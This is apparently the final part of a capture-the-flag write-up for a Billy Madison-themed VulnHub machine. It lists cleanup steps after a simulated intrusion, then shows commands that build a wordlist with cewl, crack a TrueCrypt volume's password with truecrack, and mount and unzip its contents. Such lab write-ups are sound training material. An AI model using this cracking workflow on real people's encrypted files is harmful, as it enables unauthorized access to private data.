As we were able to elevate to root using the binary at /usr/local/share/sgml/donpcgd, we should probably take a copy of this file and then remove it from the system.

Web / ftp root

eric has completely defaced the web server, so cleaning it out is probably a good course of action. As we don't have a backup available, simply removing all files from the web root will suffice (after we've taken a copy of them for later reference). In addition, we should take the same action against the ftp root.

ftp server

While the ftp server appears to be legitimate, the port knocking sequence has now been compromised, and should be changed. We can do this by editing the knockd config file at /etc/knockd.conf.


As part of cleaning up the target, we should probably go about changing passwords for all users on the target, including the users for the ftp server.


There was quite a bit to clean up here. The above is by no means an exaustive list, but it should suffice in order to wrestle control away from eric, and prevent him from gaining a foothold on the server again.

Lost document

After browsing through the filesystem, we find a directory at the root named PRIVATE. Within here, we find two files.

root@BM:~# ls -lah /PRIVATE
total 1.1M
drwx------  2 root  root  4.0K Aug 29 09:58 .
drwxr-xr-x 25 root  root  4.0K Aug 30 01:15 ..
-rw-rw-r--  1 billy billy 1.0M Aug 21 16:42 BowelMovement
-rw-r--r--  1 root  root   221 Aug 29 09:08 hint.txt

I inspect hint.txt, which reveals our next course of action.

root@BM:~# cat /PRIVATE/hint.txt
Heh, I called the file BowelMovement because it has the same initials as
Billy Madison.  That truely cracks me up!  LOLOLOL!

I always forget the password, but it's here:


First I use cewl to generate a wordlist from the Wikipedia entry.

root@kali:~# cewl --depth 0 -w billy-wiki.list
CeWL 5.2 (Some Chaos) Robin Wood ( (

So, what kind of file is BowelMovement?

root@kali:~# file BowelMovement
BowelMovement: data

Well..damn. I can't see any recognisable header, so take a stab in the dark and try truecrypt. To crack truecrypt volumes, we use the tool truecrack.

root@kali:~# truecrack -w billy-wiki.list -t BowelMovement
TrueCrack v3.0
Contact us:
Found password:        "execrable"
Password length:    "10"
Total computations:    "603"

Well, what do you know! In order to mount this, I install veracrypt. Then I mount the volume, and check out the contents.

root@kali:~# veracrypt -tc BowelMovement billy-vera
Enter password for /root/BowelMovement:
Enter keyfile [none]:
Protect hidden volume (if any)? (y=Yes/n=No) [No]:
root@kali:~# cd billy-vera
root@kali:~/billy-vera# find . -ls
        1     16 drwx------   3 root     root        16384 Dec 31  1969 .
       65      1 -rwx------   1 root     root         1000 Aug 21 10:22 ./
       66      1 drwx------   2 root     root          512 Aug 21 10:39 ./$RECYCLE.BIN
       68      1 -rwx------   1 root     root          129 Aug 21 10:39 ./$RECYCLE.BIN/desktop.ini

I proceed to unzip, and am met with success!

root@kali:~/billy-vera# unzip
  inflating: Billy_Madison_12th_Grade_Final_Project.doc  
  inflating: THE-END.txt             
root@kali:~/billy-vera# cat THE-END.txt

If you're reading this, you win!

I hope you had fun.  I had an absolute blast putting this together.

I'd love to have your feedback on the box - or at least know you pwned it!

Please feel free to shoot me a tweet or email ( and let me know with
the subject line: "Stop looking at me swan!"

Thanks much,

Brian Johnson
7 Minute Security

For completeness, the 12th grade final project consisted of..

Billy Madison
Final Project
Knibb High

                                       The Industrial Revolution

The Industrial Revolution to me is just like a story I know called "The Puppy Who Lost His Way."
The world was changing, and the puppy was getting... bigger.

So, you see, the puppy was like industry. In that, they were both lost in the woods.
And nobody, especially the little boy - "society" - knew where to find 'em.
Except that the puppy was a dog.
But the industry, my friends, that was a revolution.




This VM was a treat - such a creative piece of work, and great fun to work through. I love the additional steps required to complete by means of finding and decrypting bill's document, and detailing steps to clean up after eric's intrusion. Really, great work.

Thank you Brian Johnson for this wonderful challenge, and of course thank you VulnHub for hosting it.